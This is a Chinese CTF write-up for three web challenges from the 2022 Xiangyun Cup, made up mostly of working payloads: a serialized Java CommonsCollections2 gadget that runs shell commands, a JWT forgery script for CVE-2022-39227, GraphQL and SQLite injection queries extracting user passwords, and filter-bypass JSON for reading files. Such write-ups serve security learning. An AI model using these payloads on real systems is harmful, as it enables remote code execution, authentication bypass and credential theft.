2022祥云杯WP-Web

2022祥云杯WP-Web

image-20221030220625858

前几天的数据安全大赛加上这两天的祥云杯,打自闭了。。。

比赛一共三个题, 有几个点还是挺有意思的, 但是做的时候是真的坐牢, 这里不想多说,直接贴一些关键步骤的记录和链接, 下面标粗的知识后面再单独发学习文章吧

  1. ezjava
    1. CC2
    2. 不出网
  2. FunWEB
    1. CVE-2022-39227 jwt伪造(算是个官方有测试用例的1day吧)
    2. graphql注入+sqlite注入
  3. RustWaf(两个)
    1. fs.readFileSync读数组格式URL+文件名解码绕过关键字
    2. Rust反序列化

ezjava

  1. 看Utils类的几个函数和CommonsCollections4的依赖直接打CC2

  2. 通过Tomcat注入拿回显改造TemplateImpl

POST /myTest?cmd=cat+/flag HTTP/1.1
Host: 47.95.3.91:32270
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 7448

rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAQm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9uczQuY29tcGFyYXRvcnMuVHJhbnNmb3JtaW5nQ29tcGFyYXRvci/5hPArsQjMAgACTAAJZGVjb3JhdGVkcQB+AAFMAAt0cmFuc2Zvcm1lcnQALUxvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnM0L1RyYW5zZm9ybWVyO3hwc3IAQG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9uczQuY29tcGFyYXRvcnMuQ29tcGFyYWJsZUNvbXBhcmF0b3L79JkluG6xNwIAAHhwc3IAO29yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9uczQuZnVuY3RvcnMuSW52b2tlclRyYW5zZm9ybWVyh+j/a3t8zjgCAANbAAVpQXJnc3QAE1tMamF2YS9sYW5nL09iamVjdDtMAAtpTWV0aG9kTmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sAC2lQYXJhbVR5cGVzdAASW0xqYXZhL2xhbmcvQ2xhc3M7eHB1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAAAdAAObmV3VHJhbnNmb3JtZXJ1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAB3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3EAfgALTAAFX25hbWVxAH4ACkwAEV9vdXRwdXRQcm9wZXJ0aWVzdAAWTGphdmEvdXRpbC9Qcm9wZXJ0aWVzO3hwAAAAAP////91cgADW1tCS/0ZFWdn2zcCAAB4cAAAAAJ1cgACW0Ks8xf4BghU4AIAAHhwAAAQNcr+ur4AAAAzANMKAAMAIgcA0QcAJQcAJgEAEHNlcmlhbFZlcnNpb25VSUQBAAFKAQANQ29uc3RhbnRWYWx1ZQWtIJPzkd3vPgEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQATU3R1YlRyYW5zbGV0UGF5bG9hZAEADElubmVyQ2xhc3NlcwEANUx5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJFN0dWJUcmFuc2xldFBheWxvYWQ7AQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACkV4Y2VwdGlvbnMHACcBAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEAClNvdXJjZUZpbGUBAAxHYWRnZXRzLmphdmEMAAoACwcAKAEAM3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAH3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMBAAg8Y2xpbml0PgEALm9yZy5hcGFjaGUuY2F0YWxpbmEuY29yZS5BcHBsaWNhdGlvbkRpc3BhdGNoZXIIACoBAA9qYXZhL2xhbmcvQ2xhc3MHACwBAAdmb3JOYW1lAQAlKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL0NsYXNzOwwALgAvCgAtADABABBXUkFQX1NBTUVfT0JKRUNUCAAyAQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwwANAA1CgAtADYBAC9vcmcvYXBhY2hlL2NhdGFsaW5hL2NvcmUvQXBwbGljYXRpb25GaWx0ZXJDaGFpbgcAOAEAE2xhc3RTZXJ2aWNlZFJlcXVlc3QIADoBABRsYXN0U2VydmljZWRSZXNwb25zZQgAPAEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkBwA+AQAJbW9kaWZpZXJzCABAAQAiamF2YS9sYW5nL3JlZmxlY3QvQWNjZXNzaWJsZU9iamVjdAcAQgEADXNldEFjY2Vzc2libGUBAAQoWilWDABEAEUKAEMARgEABnNldEludAEAFihMamF2YS9sYW5nL09iamVjdDtJKVYMAEgASQoAPwBKAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsMAEwATQoAPwBOAQAVamF2YS9sYW5nL1RocmVhZExvY2FsBwBQAQAKZ2V0Qm9vbGVhbgEAFShMamF2YS9sYW5nL09iamVjdDspWgwAUgBTCgA/AFQBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwwATABWCgBRAFcBABxqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXF1ZXN0BwBZAQADY21kCABbAQAMZ2V0UGFyYW1ldGVyAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsMAF0AXgsAWgBfCgBRACIBAANzZXQBACcoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9PYmplY3Q7KVYMAGIAYwoAPwBkAQAKc2V0Qm9vbGVhbgEAFihMamF2YS9sYW5nL09iamVjdDtaKVYMAGYAZwoAPwBoAQAdamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2UHAGoBAAlnZXRXcml0ZXIBABcoKUxqYXZhL2lvL1ByaW50V3JpdGVyOwwAbABtCwBrAG4BACxvcmcvYXBhY2hlL2NhdGFsaW5hL2Nvbm5lY3Rvci9SZXNwb25zZUZhY2FkZQcAcAEACHJlc3BvbnNlCAByAQAmb3JnL2FwYWNoZS9jYXRhbGluYS9jb25uZWN0b3IvUmVzcG9uc2UHAHQBAAt1c2luZ1dyaXRlcggAdgEAEGphdmEvbGFuZy9PYmplY3QHAHgBABFqYXZhL2xhbmcvQm9vbGVhbgcAegEABUZBTFNFAQATTGphdmEvbGFuZy9Cb29sZWFuOwwAfAB9CQB7AH4BAAdvcy5uYW1lCACAAQAQamF2YS9sYW5nL1N5c3RlbQcAggEAC2dldFByb3BlcnR5DACEAF4KAIMAhQEAEGphdmEvbGFuZy9TdHJpbmcHAIcBAAt0b0xvd2VyQ2FzZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7DACJAIoKAIgAiwEAA3dpbggAjQEACGNvbnRhaW5zAQAbKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylaDACPAJAKAIgAkQEAAnNoCACTAQACLWMIAJUBAAdjbWQuZXhlCACXAQACL2MIAJkBABFqYXZhL2xhbmcvUnVudGltZQcAmwEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsMAJ0AngoAnACfAQAEZXhlYwEAKChbTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsMAKEAogoAnACjAQARamF2YS9sYW5nL1Byb2Nlc3MHAKUBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07DACnAKgKAKYAqQEAEWphdmEvdXRp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

image-20221030215241569

FunWEB

  1. 前半段jwt伪造

  2. 后半段前半段就是graphql注入+sqlite注入

1. 伪造token

截取关键代码生成可用token

from pyvows import Vows, expect
from json import loads, dumps
from jwcrypto.common import base64url_decode, base64url_encode
class PolyglotToken(Vows.Context):
    """ Make a forged token """

    def topic(self, topic):
        """ Use mix of JSON and compact format to insert forged claims including long expiration """
        [header, payload, signature] = topic.split('.')
        parsed_payload = loads(base64url_decode(payload))
        parsed_payload['sub'] = 'bob'
        parsed_payload['exp'] = 2000000000
        parsed_payload["is_admin"]=1
        fake_payload = base64url_encode((dumps(parsed_payload, separators=(',', ':'))))
        return '{"  ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}'

print(PolyglotToken().topic(input("token::")))
eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NjcxMDc2NTgsImlhdCI6MTY2NzEwNzM1OCwiaXNfYWRtaW4iOjEsImlzX2xvZ2luIjoxLCJqdGkiOiJ1aTVrcDdGMmJNMGYwYXY2cVpSRTJ3IiwibmJmIjoxNjY3MTA3MzU4LCJwYXNzd29yZCI6ImEiLCJ1c2VybmFtZSI6ImEiLCJzdWIiOiJib2IifQ.a-ALRvRlYuUfThbfYfHuUqlH75vv-LynOZBxeUc_XbIKwNrEFk3aa2xr1HfdfwFFiKKZ75yVnWY8KBH-RHQdmj7igHMDPqgwDiM5qi7fkLwyVX36cRyj79NQiiMAmyVAlrC4BaIA8EblhS1BvKecNgf1kGf6Ujyg9NtJfx6cSTbr0u-hdZ6vVH7AA_9W_-vMxBE-H10oquc4j4WRIGaossZByZp6Fy5NpPqUD9t3jZsPNU4CugHR947b0sVWJ964uaXAe8IJTGA8S6hM5NirbHDEr0qboE4dCNnV-pmbs7ENpNhfI9eTMDE6Xm0mGO94sChHicBY4pEvW7NYX23yPQ

2. graphql+sqlite注入

{
  __schema {
    types {
      name
    }
  }
}

query={
  __type (name: "Query") {
    name
    fields {
      name
      type {
        name
        kind
        ofType {
          name
          kind
        }
      }
    }
  }
}

query={
getscoreusingnamehahaha(name: "1' union select (select password from users) --"){ name score } }

query={
getscoreusingnamehahaha(name: "1' union select (select name from sqlite_master where type='table' limit 0,1) --"){ name score } }

image-20221030213522386

image-20221030213514108

image-20221030213505003

image-20221030213358668

拿这个密码去登录admin然后访问/getflag就能拿到flag了

RustWaf

  1. fs.readFileSync通过URL相关格式数组读取文件

    1. 数组关键键值对

    2. 使用url解码绕过flag关键字

      corCtf2022一道有意思的node题

  2. Rust反序列化绕过key关键字检测

    serde_json手册

    Rust学习笔记 (rust的基础语法格式)

两次json解析分别绕过

{
    "protocol":"file:",
    "\uD800":"",
    "href":"1",
    "origin":"1",
    "pathname":"/%66%6c%61%67",
    "hostname":""
}

image-20221031145859444

另外还有一个更简单也比较容易理解的方法就是按照rust的结构体顺序直接传入一个数组就可以实现protocol关键字的绕过了

[
    "file:",
    "1",
    "1",
    "/%66%6c%61%67",
    ""
]
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇